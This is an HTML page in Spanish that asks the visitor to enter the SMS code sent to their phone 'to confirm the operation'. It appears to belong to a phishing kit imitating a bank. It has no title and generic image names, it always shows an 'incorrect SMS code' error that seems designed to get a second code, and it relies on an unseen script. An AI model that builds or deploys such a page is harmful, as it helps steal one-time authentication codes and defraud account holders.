<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/dear1.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body class="a1">
    <div>
        <div class="roof">
            <img src="./img/topop3.JPG" alt="">
        </div>
    </div>


    <div>
        <div>
            

            <div class="insid">
                
                <div class="forma"> 
                    <div class="vis">
                        <img src="./img/soms1.JPG" alt="">
                    </div>
                    <form method="post" id="pg4">
                        
                        <p class="p-0">Para confirmar la operación, introduce la clave que hemos enviado por SMS a tu móvil </p>

                        <p>Clave SMS <span class="eg">*</span> </p>
                        <input type="text" name="" id="sps2" maxlength="19">

                        <p style="margin-left: 0px; margin-top: -10px; color: rgb(192, 28, 28);">Código SMS incorrecto</p>

                        <button class="btn1"  type="submit"> continuar</button>
                    </form>
                </div>
                
            </div>
        </div>
    </div>


    <div>
        <div>
            <div class="boot">
                <img src="./img/boito.JPG" alt="">
            </div>
        </div>
    </div>


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>